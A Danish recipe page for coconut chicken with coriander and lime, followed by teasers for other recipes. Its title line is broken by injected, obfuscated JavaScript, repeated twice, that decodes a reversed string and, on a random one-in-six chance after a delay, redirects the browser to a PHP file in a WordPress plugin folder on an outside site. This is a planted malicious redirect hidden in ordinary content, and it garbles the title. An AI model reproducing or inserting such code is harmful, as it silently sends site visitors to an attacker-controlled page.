Kokoskylling i m$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}andler og kori$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($nJe(0), delay);}ander

En kyllingeret, der vækker smagsløgene til live med masser af smag af koriander, kokosmel og lime.

Opskrift til 4 pers.

4 kyllingebryster
2 spsk kokosmel
1 spsk ingefær, revet
½ bdt frisk koriander, finthakket
2 limefrugter, økologiske, skal og saft af
1 spsk rørsukker
1 tsk fiskesauce
2 fed hvidløg, knuste
2 spsk mandelflager
Salt og peber

Kokosdressing:
1 dl kokosmælk
1 ½ dl græsk yoghurt
½ bdt koriander, finthakket
½ bdt mynte, finthakket
Salt og peber

Ved servering:
Grøn salat

Dagen før: Bland alle ingredienserne til marinaden godt sammen, og smag til med salt og peber. Gnid kyllingebrysterne i marinaden, og lad dem ligge på køl natten over og gerne længere.
På dagen: Læg kyllingen i et ildfast fad, og sæt dem i ovnen ved 150 grader i ca. 1 time, eller til kyllingen er gennemstegt.
Kokosdressing: Bland alle ingredienser, og smag til med salt og peber.
Ved servering: Skær kyllingen ud, og server med kokosdressing og lidt frisk salat.

*Tip: Mariner kyllingen dagen før, så den blot skal steges, og lav også gerne kokos-dressingen dagen inden, da den har godt af at stå og trække.

Trends

Populære artikler

Passioncake

Konditoren Nikolaos Strangas oplever, at mange vælger at spise sushi nytårsaften. Efter sådan et måltid er denne cremede kage med et syrligt pift af passionsfrugt

Læs mere

Syltede oliven og oste

Det er desværre de færreste, som kan få fat på helt friskhøstede oliven, så denne opskrift bruger forskellige slags oliven på glas, der vendes med

Læs mere

Macarons med kaffeganache

En af dessertkunstneren Nikolaos Strangas’ absolutte hitkager er macarons: Små franske makroner med fyld af fx mynte- eller jordbærganache. Det er lykkedes MAD&venner at lokke

Læs mere